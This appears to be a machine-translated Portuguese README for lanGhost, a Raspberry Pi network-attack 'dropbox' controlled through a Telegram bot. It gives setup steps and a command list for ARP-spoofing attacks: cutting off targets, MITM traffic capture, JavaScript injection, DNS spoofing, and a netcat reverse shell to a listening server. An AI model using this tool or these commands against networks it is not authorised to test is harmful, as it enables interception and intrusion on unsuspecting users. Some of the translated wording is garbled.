O Langhost foi projetado para pis de framboesa ( Raspbian / Kali para RPI ). Executar em outras distritos/desktop pode causar problemas e pode não funcionar como exceto.
Você precisará de um Raspberry Pi com Raspbian/Kali fresco no cartão SD, porque não quer mais nada em segundo plano.
Inicialize o PI, obtenha uma venda SSH ou conecte um monitor e um teclado e insira esses comandos:
$ sudo apt update && sudo apt install python3 python3-pip
$ git clone https://github.com/xdavidhu/lanGhost
$ cd lanGhost
$ sudo ./setup.py
Leia as perguntas/mensagens ao executar o script de configuração!
[+] Please enter the name of the network interface connected/will
be connected to the target LAN. Default wired interface is 'eth0',
and the default wireless interface is 'wlan0' on most systems, but
you can check it in a different terminal with the 'ifconfig' command.
[+] Please create a Telegram API key by messaging @BotFather on Telegram
with the command '/newbot'.
After this, @BotFather will ask you to choose a name for your bot.
This can be anything you want.
Lastly, @BotFather will ask you for a username for your bot. You have
to choose a unique username here which ends with 'bot'. For
example: xdavidbot. Make note of this username, since later
you will have to search for this to find your bot, which lanGhost
will be running on.
After you send your username of choise to @BotFather, you will recieve
your API key.
[+] Now for lanGhost to only allow access to you, you need to verify yourself.
Send the verification code below TO THE BOT you just created. Just search for your
bot's @username (what you sent to @BotFather) to find it.
[+] Verification code to send: ******
[+] Do you want lanGhost to start on boot? This option is necessary if you are using
this device as a dropbox, because when you are going to drop this device into a
network, you will not have the chanse to start lanGhost remotely! (autostart works
by adding a new cron '@reboot' entry)
Usar Langhost em uma rede maior que /24 não é recomendado porque as varreduras levarão muito tempo.
Langhost não está quieto . Qualquer pessoa que monitore o tráfego pode ver os pacotes ARP!
Se você selecionou yes
na step 4/4 (autostart)
o PI está totalmente configurado para cair. O Langhost deve iniciar a inicialização e enviar uma mensagem no Telegram com o texto: lanGhost started! ?
.
Certifique -se de experimentar primeiro em seu laboratório e testar se o Langhost estiver respondendo às suas mensagens!
Se você estiver pronto, basta conectá -lo à rede de destino conectando o cabo Ethernet ao PI e conectando a energia via micro USB e você estará pronto para ir!
(Langhost também pode funcionar sobre Wi -Fi, mas você precisará configurar wpa_supplicant
para conectar -se à rede automaticamente primeiro)
/scan - Scan LAN network
/scanip [TARGET-IP] - Scan a specific IP address.
/kill [TARGET-IP] - Stop the target's network connection.
/mitm [TARGET-IP] - Capture HTTP/DNS traffic from target.
/replaceimg [TARGET-IP] - Replace HTTP images requested by target.
/injectjs [TARGET-IP] [JS-FILE-URL] - Inject JavaScript into HTTP pages requested by target.
/spoofdns [TARGET-IP] [DOMAIN] [FAKE-IP] - Spoof DNS records for target.
/attacks - View currently running attacks.
/stop [ATTACK-ID] - Stop a currently running attack.
/restart - Restart lanGhost.
/reversesh [TARGET-IP] [PORT] - Create a netcat reverse shell to target.
/help - Display the help menu.
/ping - Pong.
Você pode iniciar um ataque usando um desses comandos: /kill, /mitm, /replaceimg, /injectjs, /spoofdns
ATER Você tem um ou mais ataques em execução, você pode usar o comando /attack
para obter uma lista deles contendo os ATTACK-ID
.
Para parar um tipo de ataque /stop [ATTACK-ID]
.
/reversesh
é apenas uma conexão NetCAT TCP que não é criptografada e todo o tráfego pode ser monitorado! Use -o apenas para correções de emergência ou para configurar uma conexão reversa criptografada, se necessário.
O comando /reversesh
é para obter um shell reverso no PI, quando não é acessível de fora.
Para usar o comando /reversesh
você precisará ter um servidor ouvindo o shell.
Comando NetCat para iniciar o ouvinte em seu servidor:
$ nc -l 0.0.0.0 [PORT]
Comando do Telegram:
/reversesh [IP-of-your-listening-server] [PORT]
/kill
- interrompe a conectividade da Internet para o alvo./mitm
- captura o tráfego HTTP e DNS do destino e o envia nas mensagens de texto./replaceimg
- substitui as imagens HTTP pelo destino para a imagem que você envia para o bot./injectjs
- Injeta JavaScript em cada resposta HTTP HTML para o destino. Você precisa hospedar o arquivo JS no seu servidor e fornecer o URL como um parâmetro./spoofdns
- SPOOFS DNS Respostas para o destino.Todos os ataques usam falsificação de ARP !
/scan
- Varredura a rede local e retorna os hosts online. Usa a varredura nmap -sn
para descobrir hosts./scanip
- digitaliza um endereço IP em busca de portas abertas e outras informações. Usa nmap -sS
Scan.Você receberá uma mensagem sempre que um novo dispositivo conectar/deixar a rede.
Copyright (c) 2018 por David Schütz. Alguns direitos reservados.
Langhost está sob os termos da licença do MIT, seguindo todos os esclarecimentos declarados no arquivo de licença. Você também pode ir em frente e me enviar um e -mail para XDavid {at} ProtonMail {dot} com.